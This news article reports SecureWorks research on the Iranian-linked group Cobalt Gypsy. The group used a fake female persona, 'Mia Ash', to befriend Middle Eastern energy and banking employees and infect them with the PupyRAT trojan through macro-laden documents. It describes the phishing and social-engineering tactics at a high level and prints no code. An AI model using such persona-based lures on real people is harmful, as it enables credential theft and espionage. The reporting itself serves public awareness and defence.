SecureWorks uncovers female 'honey pot' cyber espionage campaign
Hacking group with Iranian ties pursues Saudi targets, seeking user credentials to their corporate networks
Employees of Saudi banking and oil and gas firms have been the target of a “honey pot” phishing campaign, researchers at a security company claim.
SecureWorks said a hacking group identified as the Iranian-linked cyber espionage hacker group Cobalt Gypsy lured the male employees using an online female persona “Mia Ash.”
The research team at SecureWorks’, the Counter Threat Unit (CTU), discovered Mia Ash is a fake female “honey pot” persona and believes it has been created and is being run Cobalt Gypsy, a.k.a. OilRig. Cobalt Gypsy is often called OilRig because they have been historically known to target oil and gas, technology, engineering, aerospace and telecommunications companies in the Middle East.
The Mia Ash campaign has been designed to obtain the high- level network credentials of male employees of specific target organisations in Saudi Arabia, India, U.S, and Iraq.
In January 2017, SecureWorks discovered Cobalt Gypsy targeting Saudi financial, oil and technology executives with malware-laden phishing emails. The emails were sent from legitimate email addresses belonging to one of Saudi Arabia's biggest IT suppliers, the National Technology Group, and an Egyptian IT services firm, ITWorx. In 2015, the CTU also exposed an elaborate LinkedIn campaign conducted by CobaltGypsy, which they used to con their victims.
The scam ran from 28 December 2016 through 1 January 2017. The messages varied in themes but all contained shortened URLs. Clicking the shortened URL caused a Word document to download and attempt to run a macro. The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT, an open source, cross-platform remote access trojan (RAT). If installed PupyRAT will give the threat actor full access to the victim's system.
CTU researchers determined this activity was orchestrated by the COBALT GYPSY threat group due to the tools, techniques, and procedures (TTPs) used in both campaigns. Specifically, COBALT GYPSY has repeatedly targeted organisations impacted by these recent campaigns, used social media, particularly LinkedIn, for target identification and interaction; and weaponised Excel documents with RATs like PupyRAT to infect its victims.
It is unclear exactly what information they were trying to steal, but the malware “Mia” attempted to install was targeting “network user credentials.”
The Mia Ash persona is a Caucasian, thin, brown hair, attractive woman in her mid-twenties, purportedly living in London. She claimed to be a photographer at “Mia’s photography”.
She introduced herself as a wedding and portrait photographer reaching out to people around the world. Specifically she stated she was interested in learning more about the region in which the target resided.
Mia Ash had a Linkedin, Blogger, Facebook and WhatsApp account. She also has two email addresses.
The images she used in her social media accounts are believed to have been stolen from an actual photographer in Romania. The LinkedIn profile had over 500 connections, some photography related, most likely to make Mia Ash seem more legitimate. However, most of the connections work in regions and work for organisations which would be of interest to the Cobalt Gypsy group.
In Saudi Arabia, the known targets were a technician for an oil and gas conglomerate, IT Technical support for a large bank, and an electrical engineer for large construction and engineering firm. There were also targets in India and the US.
Most of her victims had mid-career level technology or engineering roles according to their job descriptions.
Anatomy of a scam
The victims are identified as Victim A and Victim B.
On January 12, Mia Ash reached out to an employee of a Middle Eastern company via her LinkedIn profile, and this employee’s company was sent a spearphish from Cobalt Gypsy in early January 2017. Mia then wanted to move the conversation to Facebook, but the victim preferred WhatsApp.
CTU researchers have assessed that Victim A is a real person and operates several social media accounts. According to several of these profiles, Victim A has over 10 years of experience in industries including oil/gas, aviation, and telecommunications. Victim A’s location, areas of stated expertise and past roles listed on their social media presence align with the observed interests of the COBALT GYPSY threat group. CTU researchers assert Victim A was or is a strategic target of the adversary.
Cobalt Gypsy sent a company, which employed Victim B a spear phishing email in early January 2017, which contained the PupyRAT malware. This was not successful so she then they reached out to Victim B via Mia Ash via LinkedIn and made a connection.
In February, after having befriended Victim B, she sent him a purported “photography survey” which if it had been opened, contained the PupyRAT malware. This malware would have given the cyber hackers complete control of his computer and ultimately his network credentials.
Victim B received on 12 February 2017 a phish containing Microsoft Excel document, “Copy of Photography Survey.xlsm.” to their personal email account, encouraging the victim to open the message at work, using their work email account in order for the survey to function properly. The survey contained macros that, once enabled, downloaded PupyRAT.
CTU researchers believe the Mia Ash persona was used to gain access to the targeted organisation because the first, broader campaign was unsuccessful.
Both IBM and Palo Alto have theorised that the PupyRAT malware was the initial infection vector for the destructive Shamoon attacks, which wiped out numerous computers of many large Middle Eastern companies and government organisations in November 2016 and January 2017.
This group hasn’t showed a huge change in interest. Mia Ash was likely one of many personas they operate. SecureWorks believes their objectives really haven’t changed since the company first began tracking them in 2015.